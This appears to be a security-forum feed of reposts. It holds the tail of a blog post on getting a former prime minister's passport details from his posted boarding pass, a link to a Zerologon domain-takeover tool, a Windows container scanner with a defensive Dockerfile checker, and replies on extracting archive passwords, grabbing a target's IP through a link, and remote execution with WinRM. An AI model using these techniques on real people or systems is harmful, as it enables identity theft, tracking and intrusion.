But you can’t just do that. You can’t just call someone’s phone number that you got by rummaging around in the HTML ball pit. Tony Abbott didn’t want me to have his phone number, because he didn’t give it to me. Maybe if it was urgent, or I had no other option, sure. But I was pretty sure I should do this the Nice way, and show that I come in peace.

I wanted to show that I come in peace because there’s also this pretty yikes thing that happens where you email someone being all like “henlo ur website let me log in with username admin and password admin, maybe u wanna change that??? could just be me but let me kno what u think xoxo alex” and then they reply being like “oh so you’re a HACKER and a CRIMINAL and you’ve HACKED ME AND MY FAMILY TOO and this is a RANSOM and ur from the DARK WEB i know what that is i’ve seen several episodes of mr robot WELL watch out kiddO bc me and my lawyers are bulk-installing tens of thousands of copies of McAfee® Gamer Security as we speak, so i’d like 2 see u try”

Surely you just contact Tony Abbott officially

I googled “tony abbott contact”, but there’s only his official website. There’s no phone number on it, only a “contact me” form.

I imagine there have been some passionate opinions typed into this form at 9pm on a Tuesday

Yeah right, have you seen the incredible volume of #content people want to say at politicians? No way anyone’s reading that form.

I later decided to try anyway, using the same Inspect Element ritual from earlier. Looking at the network requests the page makes, I divined that the “Contact me” form just straight up does not work.
When you click “submit”, you get an error, and nothing gets sent.

This is an excellent way of using computers to solve the problem of “random people keep sending me angry letters”

Well rip I guess. I eventually realised the people to talk to were probably the government.

The government

It’s a big place. In the beginning, humans developed the concept of language by banging rocks together and saying “oof, oog, and so on”. Then something went horribly wrong, and now people unironically begin every sentence with “in regards to”. Our story begins here.

The government has like fifty thousand million different departments, and they all know which acronyms to call each other, but you don’t. If you EVER call it DMP&C instead of DPM&C you are gonna be express email forwarded into a nightmare realm the likes of which cannot be expressed in any number of spreadsheet cells, in spite of all the good people they’ve lost trying.

I didn’t even know where to begin with this. Desperately, I called Tony Abbott’s former political party, who were all like

Skip skip skip a few more calls like this.

Maybe I knew someone who knew someone

That’s right, the true government channels were the friends we made along the way. I asked hacker friends who seemed like they might know government security people. “Where do I report a security issue with like…. a person, not a website?” They told me to call… 1300 CYBER1?

1300 CYBER1

I don’t really have a good explanation for this so I’m just gonna post the screenshots.

My friend showing me where to report a security issue with the government. I’m gonna need you to not ask any questions about the profile pictures.

Uhhh no wait I don’t wanna click any of these

The planet may be dying, but we live in a truly unparalleled age of content. You know I smashed that call button on 1300 CYBER1. Did they just make it 1300 CYBER then realise you need one more digit for a phone number? Incredible.
Calling 1300 c y b e r o n e

“Yes yes hello, ring ring, is this 1300 cyber one”? They have to say yes if you ask that. They’re legally obligated.

The person who picked up gave me an email address for ASD (the Australian flavour of America’s NSA), and told me to email them the details.

Emailing the government my crimes

Feeling like the digital equivalent of three kids in a trenchcoat, I broke out my best Government Email dialect and emailed ASD, asking for them to call me if they were the right place to tell about this.

Sorry for the clickbait subject but well that’s what happened???

Fooled by my flawless disguise, they replied instantly (in a relative sense) asking for more details.

“Potential” exposure, yeah okay. At least the subject line had “[SEC=Sensitive]” in it so I _knew_ I’d made it big

I absolutely could provide them with more information, so I did, because I love to cooperate with the Australian government. I also asked whether they could give me permission to publish this blog post, and they were all like “Seen 2:35pm”.

Eventually, after another big day of getting left on read by the government, they replied, being all like “thanks kiddO, we’re doing like, an investigation and stuff, so we’ll take it from here”.

Overall, ASD were really nice to me about it and happy that I’d helped. They encouraged me to report this kind of thing to them if it happened again, but I’m not really in the business of uhhhhhhhh whatever the heck this is.

By the way, at this point in the story (chronologically) I had no idea if what I was emailing the government was actually the confession to a crime, since I hadn’t talked to a lawyer yet. This is widely regarded as a bad move. I do not recommend anyone else use “but I’m being so helpful and earnest!!!” as a legal defence. But also I’m not a lawyer, so idk, maybe it works?

Wholesomely emailing the government

At one point in what was surely an unforgettable email chain, the person I was emailing added a P.S. containing….
the answer to the puzzle hidden on this website. The one you’re reading this blog on right now. Hello.

I guess they must have found this website (hi asd) by stalking the email address I was sending from. This is unprecedented and everything, but:

The puzzle says to tweet the answer at me, not email me
The prize for doing the puzzle is me tweeting this gif of a shakas to you

yeahhhhhhhhhh, nice

So I guess I emailed the shakas gif to the government??? Yeah, I guess I did.

Please find attached

Can I write about this?

I asked them if they could give me permission to write this blog post, or who to ask, and they were like “uhhhhhhhhhhh” and gave me two government media email addresses to try. Listen I don’t wanna be an “ummm they didn’t reply to my emAiLs” kinda person buT they simply left me no choice.

Still, defending the Commonwealth was in ASD’s hands now, and that’s a win for me at this point.

☑️ figure out whether i have done a crime
☑️ notify someone (The Government) that this happened
⬜ get permission to publish this here blog post
⬜ tell qantas about the security issue so they can fix it

Part 3: Telling Qantas the bad news

The security issue

Hey remember like fifteen minutes ago when this post was about webpages? I’m guessing Qantas didn’t want to send the customer their passport number, phone number, and staff comments about them, so I wanted to let them know their website was doing that. Maybe the website was well meaning, but ultimately caused more harm than good, like how that time the bike path railings on the Golden Gate Bridge accidentally turned it into the world’s largest harmonica.

Unblending the smoothie

But why does the website even send you all that stuff in the first place? I don’t know, but to speculate wildly: Maybe the website just sends you all the data it knows about you, and then only shows you your name, flight times, etc, while leaving the passport number etc. still in the page.
If that were true, then Qantas would want to unblend the digital smoothie they’ve sent you, if you will. They’d want to change it so that they only send you your name and flight times and stuff (which are a key ingredient of the smoothie to be sure), not the whole identity fraud smoothie.

Smoothie evangelism

I wanted to tell them the smoothie thing, but how do I contact them? The first place to check is usually company.com/security, maybe that’ll w-

Okay nevermind

Okay fine maybe I should just email security@qantas.com.au surely that’s it?

I could only find a phone number to report security problems to, and I wasn’t sure if it was like…. airport security? So I just… called the number and was like “heyyyy uhhhh I’d like to report a cyber security issue?”, and the person was like “yyyyya just email security@qantas.com.au” and i was like “ok sorrY”.

Time to email Qantas I guess

I emailed Qantas, being like “beep boop here is how the computer problem works”. (Have you been wondering about the little dots in this post? Click this one for the rest of the email .)

A few days later, I got this reply.

And then I never heard from this person again

Airlines were going through kinda a struggle at the time, so I guess that’s what happened? if ur still out there Shr Security i miss u

Struggles

After filling up my “get left on read” combo meter, I desperately resorted to calling Qantas’ secret media hotline number. They said the issue was being fixed by Amadeus, the company who makes their booking software, rather than with Qantas itself. I’m not sure if that means other Amadeus customers were also affected, or if it was just the way Qantas was using their software, or what.

It’s common to give companies 90 days to fix the bug, before you publicly disclose it. It’s a tradeoff between giving them enough time to fix it, and people being hacked because of the bug as long as it’s out there. But, well, this was kinda a special case.
Qantas was going through some #struggles, so it was taking longer. Lots of their staff were stood down, and the world was just generally more cooked. At the same time, hardly anybody was flying at the time, due to see above re: #struggles. So, I gave Qantas as much time as they needed.

Five months later

The world is a completely different place, and Qantas replies to me, saying they fixed the bug. It did take five months, which is why it took so long for you and I to be having this weird textual interaction right now.

I don’t have a valid Booking Reference, so I can’t actually check what’s changed. I asked a friend to check (with an expired Booking Reference), and they said they didn’t see a mention of “documentNumber” anymore, which sounds like the passport number is no longer there. But That’s Not Science, so I don’t know for sure.

I originally found the bug in March, which was about 60 years ago. BUT we got there baybee, Qantas emailed me saying the bug had been fixed on August 21. They later told me they actually fixed the bug in July, but the person I was talking to didn’t know about it until August.

Qantas also said this when I asked them to review this post:

Thanks again for letting us have the opportunity to review and again for refraining from posting until the fix was in place for vulnerability. Our standard advice to customers is not to post pictures of the boarding pass, or to at least obscure the key personal information if they do, because of the detail it contains. We appreciate you bringing it to our attention in such a responsible way, so we could fix the issue, which we did a few months ago now.

I couldn’t find any advice on their website about not posting pictures of customer boarding passes, only news articles about how Qantas stopped printing the Frequent Flyer number on the boarding pass last year, because… well, you can see why.
I also asked Qantas what they did to fix the bug, and they said:

Unfortunately we’re not able to provide the details of fix as it is part of the protection of personal information.

☑️ figure out whether i have done a crime
☑️ notify someone (The Government) that this happened
⬜ get permission to publish this here blog post
☑️ tell qantas about the security issue so they can fix it

Part 4: Finding Tony Abbott

Like 2003’s Finding Nemo, this section was an emotional rollercoaster.

The government was presumably helping Tony Abbott reset his passport number, and making sure his current one wasn’t being used for any of that yucky identity fraud. But, much like Shannon Noll’s 2004 What About Me?, what about me?

I really wanted to write a blog post about it, you know? So I could warn people about the non-obvious risk of sharing their boarding passes, and also make dumb and inaccessible references to the early 2000s.

The government people I talked to couldn’t give me permission to write this post, so rather than willingly wandering deeper into the procedurally generated labyrinth of government department email addresses (it’s dark in there), I tried to find Tony Abbott or his staff directly.

Calling everybody in Australia one by one

I called Tony Abbott’s former political party again, and asked them how to contact him, or his office, or something I’m really having a moment rn.

They said they weren’t associated with him anymore, and suggested I call Parliament House, like I was the Queen or something. In case you don’t know it, Parliament House is sorta like the White House, I think?
The Prime Minister lives there and has a nice little garden out the back with a macadamia tree that never runs out, and everyone works in different colourful sections like “Making it so Everyone Gets a Fair Shake of the Sauce Bottle R&D” and “Mateship” and they all wear matching uniforms with lil kangaroo and emu hats, and they all do a little dance every hour on the hour to celebrate another accident-free day in the Prime Minister’s chocolate factory.

calling parliament house i guess

Not really sure what to expect, I called up and was all like “yeah bloody g’day, day for it ay, hot enough for ya?”. Once the formalities were out of the way, I skipped my usual explanation of why I was calling and just asked point-blank if they had Tony Abbott’s contact details.

The person on the phone was casually like “Oh, no, but I can put you through to the Serjeant-at-arms, who can give you the contact details of former members”. I was like “…..okay?????”. Was I supposed to know who that was? Isn’t a Serjeant like an army thing? But no, the Serjeant-at-arms was just a nice lady who told me “he’s in a temporary office right now, and so doesn’t have a phone number. I can give you an email address or a P.O. box?”. I was like “ok th-thank you your majesty”.

It felt a bit weird just…. emailing the former PM being like “boy do i have bad news for you”, but I figured he probably wouldn’t read it anyway. If it was that easy to get this email address, everyone had it, and so nobody was likely to be reading the inbox.

Spoilers: It didn’t work.

Finding Tony Abbott’s staff

I roll out of bed and stare bleary-eyed into the morning sun, my ultimate nemesis, as Day 40 of not having found Tony Abbott’s staff begins. This time for sure.

Retinas burning, in a moment of determination/desperation/hubris, I went and asked even more people that might know how to contact Tony Abbott’s staff.
I asked a journalist friend, who had the kind of ruthlessly efficient ideas that come from, like, being a professional journalist. They suggested I find Tony Abbott’s former staff from when he was PM, and contact their offices and see if they have his contact details. It was a strange sounding plan to me, which I thought meant it would definitely work.

Wikipedia stalking

Apparently Prime Ministers themselves have “ministers” (not prime), and those are their staff. That’s who I was looking for.

Big “me and the boys” energy

Okay but, the problem was that most of these people are retired now, and the glory days of 2013 are over. Each time I hover over one of their names, I see “so-and-so is a former politician and….” and discard their Wikipedia page like a LeSnak wrapper into the wind.

Eventually though, I saw this minister.

Oh he definitely has an office.

That’s the current Prime Minister of Australia (at the time of writing, that is, for all I know we’re three Prime-Ministers deep into 2020 by the time you read this), you know he’s definitely gonna be easier to find.

Let’s call the Prime Minister’s office I guess?

Easy google of the number, absolutely no emotional journey resulting in my growth as a person this time.

When I call, I hear what sounds like two women laughing in the background? One of them answers the phone, slightly out of breath, and says “Hello, Prime Minister’s office?”. I’m like “….hello? Am I interrupting something???”.

I clumsily explain that I know this is Scott Morrison’s office, but I actually was wondering if they had Tony Abbott’s contact details, because it’s for “a time-sensitive media enquiry”, and I j- She interrupts to explain “so Tony Abbott isn’t Prime Minister anymore, this is Scott Morrison’s office” and I’m like “yA I know please I am desperate for these contact details”. She says “We wouldn’t have that information but I’ll just check for you” and then pauses for like, a long time? Like 15 seconds?
I can only wonder what was happening on the other end. Then she says “Oh actually I can give you Tony Abbott’s personal assistant’s number? Is that good?”.

Ummmm YES thanks that’s what I’ve been looking for this whole time? Anyway brb i gotta go be uh a journalist or something.

Calling Tony Abbott’s personal assistant’s personal assistant

I fumble with my phone, furiously trying to dial the number. I ask if I’m speaking to Tony Abbott’s personal assistant. The person on the other end says no, but he is one of Tony Abbott’s staff.

It has been a long several months of calling people. The cold ice is starting to thaw. One day, with enough therapy, I may be able to gather the emotional resources necessary to call another government phone number.

I explain the security issue I want to report, and midway through he interrupts with “sorry…. who are you and what’s the organisation you’re calling from?” and I’m like “uhhhh I mean my name is Alex and uhh I’m not calling from any organisation I’m just like a person?? I just found this thing and…”. The person is mercifully forgiving, and says that he’ll have to call me back. I stress once again that I’m calling to help them, happy to wait to publish until they feel comfortable, and definitely do not warrant the bulk-installation of antivirus products.

Calling Tony Abbott’s personal assistant

An hour later, I get a call from a number I don’t recognise. He explains that the guy I talked to earlier was his assistant, and he’s Tony Abbott’s PA. Folks, we made it. It’s as easy as that.

He says he knows what I’m talking about. He’s got the emails. He’s already in the process of getting Tony Abbott a new passport number. This is the stuff. It’s all coming together.

I ask if I can publish a blog post about it, and we agree I’ll send a draft for him to review.

And then he says “These things do interest him - he’s quite keen to talk to you”

I was like exCUSE me?
Tony Abbott, Leader of the 69th Ministry of Australia, wants to call me on the phone?

I suppose I owe this service to my country? This story was already completely cooked so sure, whatever. I’d already declared emotional bankruptcy, so nothing was coming as a surprise at this point.

I asked what he wanted to talk about. “Just to pick your brain on these things”. We scheduled a call for 3:30 on Monday.

And then Tony Abbott just… calls me on the phone?

Mostly, he wanted to check whether his understanding of how I’d found his passport number was correct (it was). He also wanted to ask me how to learn about “the IT”.

He asked some intelligent questions, like “how much information is in a boarding pass, and what do people like me need to know to be safe?”, and “why can you get a passport number from a boarding pass, but not from a bus ticket?”. The answer is that boarding passes have your password printed on them, and bus tickets don’t. You can use that password to log in to a website (widely regarded as a bad move), and at that point all bets are off, websites can just do whatever they want.

He was vulnerable, too, about how computers are harder for him to understand. “It’s a funny old world, today I tried to log in to a [Microsoft] Teams meeting (Teams is one of those apps), and the fire brigade uses a Teams meeting. Anyway I got fairly bamboozled, and I can now log in to a Teams meeting in a way I couldn’t before. It’s, I suppose, a terrible confession of how people my age feel about this stuff.”

Then the Earth stopped spinning on its axis. For an instant, time stood still. Then he said it:

“You could drop me in the bush and I’d feel perfectly confident navigating my way out, looking at the sun and direction of rivers and figuring out where to go, but this! Hah!”

This was possibly the most pure and powerful Australian energy a human can possess, and explains how we elected our strongest as our leader.
The raw energy did in fact travel through the phone speaker and directly into my brain, killing me instantly.

When I’d collected myself from various corners of the room, he asked if there was a book about the basics of IT, since he wanted to learn about it. That was kinda humanising, since it made me realise that even famous people are just people too.

Anyway I hadn’t heard of a book that was any good, so I told a story about my mum instead.

A story about my mum instead

I said there probably was a book out there about “the basics of IT”, but it wouldn’t help much. I didn’t learn from a book. 13 year old TikTok influencers don’t learn from a book. They just vibe.

My mum always said when I was growing up that:

There were “too many buttons”
She was afraid to press the buttons, because she didn’t know what they did

I can understand that, since grown ups don’t have the sheer dumb hubris of a child, and that’s what makes them afraid of the buttons. Like, when a toddler uses a spoon for the first time, they don’t know what a spoon is, where they are, or who the current Prime Minister is. But they see the spoon, and they see the cereal, and their dumb baby brain is just like “yeA” and they have a red hot go. And like, they get it wrong the first few times, but it doesn’t matter, because they don’t know to be afraid of getting it wrong. So eventually, they get it right.

leaked footage of me learning how to hack

Okay so I didn’t tell the spoon thing to Tony Abbott, but I did tell him what I always told my mum, which was: “Mum you just gotta press all the buttons, to find out what they do”. He was like “Oh, you just learn by trial and error”. Exactly!

Now that I think about it, it’s a bit scary. We are dumb babies learning to use a spoon for the first time, except if you do it wrong some clown writes a blog post about you. Anyway good luck out there to all you big babies.
Asking to publish this blog post

When I asked Tony Abbott for permission to publish the post you are reading right now while neglecting your responsibilities, he said “well look Alex, I don’t have a problem with it, you’ve alerted me to something I probably should have known about, so if you wanna do that, go for it”.

At the end of the call, he said “If there’s ever anything you think I need to know, give us a shout”.

Look you gotta hand it to him. That’s exactly the right way to respond when someone tells you about a security problem. Back at the beginning, I was kinda worried that he might misunderstand, and think I was trying to hack him or something, and that I’d be instantly slam dunked into jail. But nope, he was fine with it. And now you, a sweet and honourable blog post browser, get to learn the dangers of posting your boarding pass by the realest of real-world examples.

During the call, I was completely in shock from the lost in the bush thing killing me instantly, and so on. But afterwards, when I looked at the quotes, I realised he just wanted to understand what had happened to him, and more about how technology works. That’s the same kind of curiosity I had, that started this whole surrealist three-act drama. That… wasn’t really what I was expecting from Tony Abbott, but it’s what I found.

The point of this story isn’t to say “wow Tony Abbott got hacked, what a dummy”. The point is that if someone famous can unknowingly post their boarding pass, anyone can.

Anyway that’s why I vote right wing now baybeeeee.

☑️ figure out whether i have done a crime
☑️ notify someone (The Government) that this happened
☑️ get permission to publish this here blog post
☑️ tell qantas about the security issue so they can fix it

Act 3: Closing credits

Wait no what the heck did I just read

Yeah look, reasonable.

tl; dr

Your boarding pass for a flight can sometimes be used to get your passport number.
Don’t post your boarding pass or baggage receipt online, keep it as secret as your passport.

How it works

The Booking Reference on the boarding pass can be used to log in to the airline’s “Manage Booking” page, which sometimes contains the passport number, depending on the airline.

I saw that Tony Abbott had posted a photo of his boarding pass on Instagram, and used it to get his passport details, phone number, and internal messages between Qantas flight staff about his flight booking.

Why did you do this?

One day, my friend who was also in “the group chat” said “I was thinking…. why didn’t I hack Tony Abbott? And I realised I guess it’s because you have more hubris”. I was deeply complimented by this, but that’s not the point. The point is that you, too, can have hubris.

You know how they say to commit a crime (which once again I insist did not happen in my case) you need means, motive, and opportunity? Means is the ability to use right click > Inspect Element, motive is hubris, and opportunity is the dumb luck of having my friend message me the Instagram post.

I know, I’ve been saying “hubris” a lot. I mean “the willingness to risk breaking the rules”.

Now hold up, don’t go outside and do crimes (unless it’s really funny). I’m not talking about breaking the law, I’m talking about rules we just follow without realising, like social rules and conventions.

Here’s a simple example. You’re at a sufficiently fancy restaurant, like I dunno, with white tablecloths or something? The waiter asks if you’d like “still or sparkling water?” If you say “still”, it costs Eleven Dollars. If you say “sparkling”, it costs Eleven Dollars and tastes all gross and fizzy. But if you say “tap water, please”, you just get tap water, what you wanted in the first place?

When I first saw someone do this I was like “you can do that? I just thought you had to pay Eleven Dollars extra at fancy restaurants!”. It’s not written down anywhere that you can ask for tap water.
But when I found out you could do that, and like, nothing bad happens, I could suddenly do it too. Miss me with that Eleven Dollars fizzy water.

Basically, until you’ve broken the rules, the idea that the rules can be broken might just not occur to you. That’s how it felt for me, at least.

In conclusion, to be a hacker u ask for tap water.

FAQ

Why is it bad for someone else to have your passport number?

Hey crime gang, welcome back to Identity Fraud tips and tricks with Alex.

A passport is government-issued ID. It’s how you prove you’re you. The fact that you have your passport and I don’t is how you prevent me from convincing the government that I’m you and doing crimes in your name. Just having the information on the passport is not quite as powerful as a photo of the full physical passport, with your photo and everything.

With your passport number, someone could:

Book an international flight as you.
Apply for anything that requires proof of identity documentation with the government, e.g. Working with children check
Activate a SIM card (and so get an internet connection that’s traceable to you, not them, hiding them from the government)
Create a fake physical passport from a template, with the correct passport number (which they then use to cross a border, open a bank account, or anything)
who knows what else, not me, bc i have never done a crime

Am I a big bozo, a big honking goose, if I post my boarding pass on Instagram?

Nah, it’s an easy mistake to make. How are you supposed to know not to? It’s not obvious that your boarding pass is secret, like a password. I think it’s on the airline to inform you on the risks you’re taking when you use their stuff.

But now that you’ve read this blog post, I regret to inform you that you will in fact be an entire sack of geese if you go and post your boarding pass now.

When did all of this happen?

March 22 - @hontonyabbott posts a picture of a boarding pass and baggage receipt.
I log in to the website and get the passport number, phone number, and internal Qantas comments.
March 24 - I contact the Australian Signals Directorate (ASD) and let them know what happened.
March 27 - ASD tells me their investigation is complete, I send them a shakas gif, and they thank me for being a good citizen.
March 29 - I learn from lawyers that I have not done a crime 💯
March 30 - I contact Qantas and tell them about the vulnerability.
May 1 - Tony Abbott calls me, we chat about being dropped in the middle of the bush.
July 17 - Paper Mario: The Origami King is released for Nintendo Switch.
August 21 - Qantas emails me saying the security problem has been fixed.
September 13 - Various friends finish reviewing this post ❤️
September 15 - Tony Abbott and Qantas review this post.
Today - You read this post instead of letting it read you, nice job you.

I’m bored and tired

Let me answer that question,,, with a question. Maybe try drinking some water you big goose.

Honk honk, I’m so dehydrated lol. That’s you.

honk honk honk honl

Yeah, exactly.

I wrote this because I can’t go back to the Catholic church ever since they excommunicated me in 1633 for insisting the Earth revolves around the sun. You can talk to me about it by sliding into my DMs in the tweet zone or, if you must, email.

Sursa: https://mango.pdf.zone/finding-former-australian-prime-minister-tony-abbotts-passport-number-on-instagram
  11. Zer0Dump

    Zer0dump is a PoC exploit/tool for abusing the vulnerabilities associated with CVE-2020-1472 (Zerologon) in order to initiate a full system takeover of an unpatched Windows domain controller. Special thanks to @dirkjanm and @SecureAuthCorp

    Source: https://github.com/bb00/zer0dump
  12. Security Engineering — Third Edition

I'm writing a third edition of Security Engineering, which will be published in November 2020. With both the first edition in 2001 and the second edition in 2008, I put six chapters online for free at once, then added the others four years after publication. For the third edition, I negotiated an agreement with the publishers to put the chapters online for review as I wrote them. So the book came out by instalments over 2019-20, like Dickens' novels. Once the manuscript goes to press at the end of September 2020, all except seven sample chapters will disappear for a period of 42 months. I'm afraid the publishers insist on that. But thereafter the whole book will be free online forever. You may pre-order the paper book here for delivery at the end of November in the USA and here for delivery in January 2021 in the UK.

Here are the chapters I've put online for review so far:
- Preface
- Chapter 1: What is Security Engineering?
- Chapter 2: Who is the Opponent?
- Chapter 3: Psychology and Usability
- Chapter 4: Protocols
- Chapter 5: Cryptography
- Chapter 6: Access Control
- Chapter 7: Distributed Systems
- Chapter 8: Economics
- Chapter 9: Multilevel Security
- Chapter 10: Boundaries
- Chapter 11: Inference Control
- Chapter 12: Banking and Bookkeeping
- Chapter 13: Physical Protection
- Chapter 14: Monitoring and Metering
- Chapter 15: Nuclear Command and Control
- Chapter 16: Security Printing and Seals
- Chapter 17: Biometrics
- Chapter 18: Physical Tamper Resistance
- Chapter 19: Side Channels
- Chapter 20: Advanced Cryptographic Engineering
- Chapter 21: Network Attack and Defence
- Chapter 22: Phones
- Chapter 23: Electronic and Information Warfare
- Chapter 24: Copyright and DRM
- Chapter 25: Taking Stock (1 Sep)
- Chapter 26: Surveillance or Privacy?
- Chapter 27: Secure Systems Development
- Chapter 28: Assurance and Sustainability
- Chapter 29: Beyond 'Computer Says No' (1 Sep)
- Bibliography

If you see anything wrong or missing, or you think some aspect of any chapter topic isn't covered adequately, please email me at Ross dot Anderson at cl dot cam dot ac dot uk. This approach was inspired by the collaborative authorship model pioneered by my late friend and colleague David MacKay for his great books on sustainable energy and coding theory. I made a video for the launch, which you can watch here. For comments, see our blog here, Bruce Schneier's blog here and El Pais here.

Source: https://www.cl.cam.ac.uk/~rja14/book.html
  13. Whalescan

Released as open source by NCC Group Plc - https://www.nccgroup.com/
Developed by Saira Hassan (@saiii_h) https://github.com/nccgroup/whalescan
Released under Apache license 2.0, see LICENSE for more information

Introduction

Whalescan is a vulnerability scanner for Windows containers, which performs several benchmark checks, as well as checking for CVEs/vulnerable packages on the container. It also checks the config and Docker files for misconfigurations. This tool can be used as part of a Windows container review on local copies of the containers, and on the host itself to enhance security.

Getting Started

git clone https://github.com/saira-h/whalescan
pip install -r requirements.txt
./main.py

Overview

Whalescan performs the following checks on containers:

Container checks
- Checks if containers are stored under the C: drive - this could raise issues if there is a DoS attack, filling up the C: drive and making the host unresponsive
- Checks if the container is running as a process or Hyper-V. Hyper-V isolation offers enhanced security of containers
- Checks if there are any pending updates in the containers, and if so, how to update.

Image checks
- Checks for unsafe commands being used in the Dockerfile, for example docker ADD instead of docker COPY.
- Checks if hash verification is being performed on any files downloaded.
- Checks if any vulnerable packages are on the container, and pulls relevant CVE information
- Checks if the .NET version being used is End Of Life
- Checks if Docker Engine is updated, and if not, gathers a list of CVEs for the version being used
- Checks permissions of Docker configuration files
- Checks if additional devices have been mapped to containers

Source: https://github.com/nccgroup/whalescan
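Two of the image checks listed above (ADD used where COPY would do, and files downloaded without hash verification) can be reproduced with a small Dockerfile parser. The block below is an added example written for this post, not Whalescan's own code: the sample Dockerfile and the example.invalid URLs in it are constructed, it assumes the default backslash escape character (a Dockerfile that sets `# escape=` to a backtick would need the continuation logic adjusted), and its lists of download and hash keywords are an illustrative subset rather than a complete one.

```python
"""Minimal Dockerfile checker for two of the image checks listed above.

Added example, not Whalescan's own code. It flags:
  * ADD instructions (ADD can fetch remote URLs and auto-extracts archives;
    COPY does neither, so ADD deserves a second look)
  * RUN steps that download a file without a hash check in the same step

Assumptions: the Dockerfile uses the default backslash escape character,
and SAMPLE_DOCKERFILE below is constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: one unverified remote ADD, one unverified download,
# one download that is hash-checked, one plain COPY.
SAMPLE_DOCKERFILE = r"""FROM mcr.microsoft.com/windows/servercore:ltsc2019
# ADD of a remote URL: fetched at build time, never verified
ADD https://example.invalid/tools/agent.zip C:\agent.zip
# Download with no hash check
RUN powershell -Command "Invoke-WebRequest -Uri https://example.invalid/installer.msi -OutFile C:\installer.msi"
# Download followed by a SHA256 comparison in the same step: acceptable
RUN powershell -Command "Invoke-WebRequest -Uri https://example.invalid/good.zip -OutFile C:\good.zip; \
    if ((Get-FileHash C:\good.zip -Algorithm SHA256).Hash -ne 'PLACEHOLDER_SHA256') { exit 1 }"
COPY app C:\app
"""

# Tools that fetch files inside a RUN step (Windows and Linux flavours); illustrative subset.
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|start-bitstransfer|downloadfile|\bcurl\b|\bwget\b)", re.I)
# Evidence that the same step verifies what it fetched; illustrative subset.
HASH_RE = re.compile(
    r"(get-filehash|certutil\s+.*-hashfile|sha256sum|sha512sum|sha256|sha512)", re.I)
URL_RE = re.compile(r"https?://", re.I)


@dataclass
class Finding:
    line: int          # first line of the offending instruction
    instruction: str   # ADD or RUN
    message: str


def parse_instructions(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, KEYWORD, args) tuples, joining backslash
    continuations and skipping blank lines and comments."""
    instructions: List[Tuple[int, str, str]] = []
    pending: List[str] = []
    first_line: Optional[int] = None
    for line_no, raw in enumerate(text.splitlines(), 1):
        stripped = raw.strip()
        if not pending and (not stripped or stripped.startswith("#")):
            continue
        if first_line is None:
            first_line = line_no
        if stripped.endswith("\\"):
            pending.append(stripped[:-1].strip())
            continue
        pending.append(stripped)
        keyword, _, args = " ".join(pending).partition(" ")
        instructions.append((first_line, keyword.upper(), args.strip()))
        pending, first_line = [], None
    return instructions


def check_dockerfile(text: str) -> List[Finding]:
    """Run the ADD and unverified-download checks over a Dockerfile."""
    findings: List[Finding] = []
    for line_no, keyword, args in parse_instructions(text):
        if keyword == "ADD":
            if URL_RE.search(args):
                findings.append(Finding(line_no, "ADD",
                    "ADD fetches a remote URL at build time with no integrity check; "
                    "download it in a RUN step and verify a hash, or COPY a vetted local file"))
            else:
                findings.append(Finding(line_no, "ADD",
                    "ADD used for a local path; prefer COPY (ADD also auto-extracts archives)"))
        elif keyword == "RUN" and DOWNLOAD_RE.search(args) and not HASH_RE.search(args):
            findings.append(Finding(line_no, "RUN",
                "file downloaded without hash verification in the same step"))
    return findings


if __name__ == "__main__":
    for f in check_dockerfile(SAMPLE_DOCKERFILE):
        print(f"line {f.line}: {f.instruction}: {f.message}")
```

On the constructed sample this reports the remote ADD on line 3 and the unverified Invoke-WebRequest on line 5; the hash-checked download and the COPY pass. A real scanner would also need to follow multi-stage builds and recognise the project's own download helpers, which is why the keyword lists here are only a starting point.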
  14. Then it's worse than I expected. But in the end there's no need to find the password if they only want the files. They should try Process Monitor and look at the file writes; it's possible they are written somewhere in %TEMP%. If everything is done in memory, in theory that's bad, but in practice you can still set breakpoints on WriteFile(Ex) or even NtWriteFile and see the contents of the files there.
  15. I don't know whether it's legal or illegal, but I don't think it can be done directly with a pixel/image in chat, because Instagram, Facebook, Twitter and other platforms have "protection" against these things: it's not the user's browser that will make the request for that pixel/image but the platform's backend. If you really want something to work, you send them a link to something and a message convincing the person to open it. If they do that, you can find out their IP. Now comes the question: what do you do with the IP? These aren't the days of X years ago when a "whois" showed someone's home address. And an IP is probably used by many people. I don't think it helps much. What's actually the idea? I mean, why would you want to do this? I'm thinking of the case where you "have a problem" with that person, and honestly the solution is simpler: talk to them and resolve the problem, we're human.
  16. Hi, first of all try opening the application in a text editor like Notepad++ and looking through it; you might see the password there. Something more practical would be to run a "strings" utility (Linux or Windows), which automatically extracts the strings, among which the password may be. You can watch the binary's activity, but that decryption will PROBABLY happen in memory. However, I wouldn't be surprised if it ran a command-line binary where the password also appears, so a solution like Process Monitor, as @gigiRoman also mentioned, could be very useful. If those don't work, the application probably has to be opened in a debugger like x64dbg. If it's something simpler, you can look at the list of imported libraries (DLLs) and set breakpoints on the Zip-opening functions, which probably take the password as one of their parameters. If it's statically linked, it's worse. In principle it can be done, but these would roughly be the steps to try, from simpler to more complicated.
  17. So that's a Sandboxie bypass? I haven't seen the file that was sent. I don't see why the connections would be limited; that doesn't seem like a problem to me. English?
  18. WinRM is a service that can run on almost all Windows versions with PowerShell. It uses HTTP (data isn't transmitted in clear text, it just uses HTTP as the protocol) on port 5985 and HTTPS on port 5986. This service listens on those ports and sysadmins can connect, log in and run PowerShell scripts/commands. A web proxy is used when you want to connect from a PC to somewhere on the Internet (and, as I said, it can be bypassed by design if it's the one set in Windows). Sysadmin -- WinRM --> PC they need to work on -- HTTP via web proxy --> The sites the user of that PC visits
  19. It's not pointless, it's an alternative to psexec (which is detectable). WinRM is used by sysadmins (officially) for managing Windows systems with PowerShell, the same way SSH and bash are used on Linux. What it actually does is roughly the same thing: it creates a scheduled task through which it runs whatever you want as SYSTEM. Of course, it requires the necessary privileges. You don't "go out to the Internet with system processes" - there is no such limitation anyway. Moreover, at the operating system level a global proxy can be set, but applications (of any kind, whether running as a regular user or as services like SYSTEM) are not required to honor it. There are Windows functions that automatically honor it, but if an application manually creates a socket and connects it to an IP on the Internet, it won't honor that setting.
  20. Yes, WordPress uses prepared statements (which is not true of all templates and plugins); I think it was just used for testing when the article was written, so that it would be easier to understand.
  21. “I’ve found multiple blatant attempts by foreign national governments to abuse our platform on vast scales to mislead their own citizenry, and caused international news on multiple occasions. I have personally made decisions that affected national presidents without oversight, and taken action to enforce against so many prominent politicians globally that I’ve lost count.”

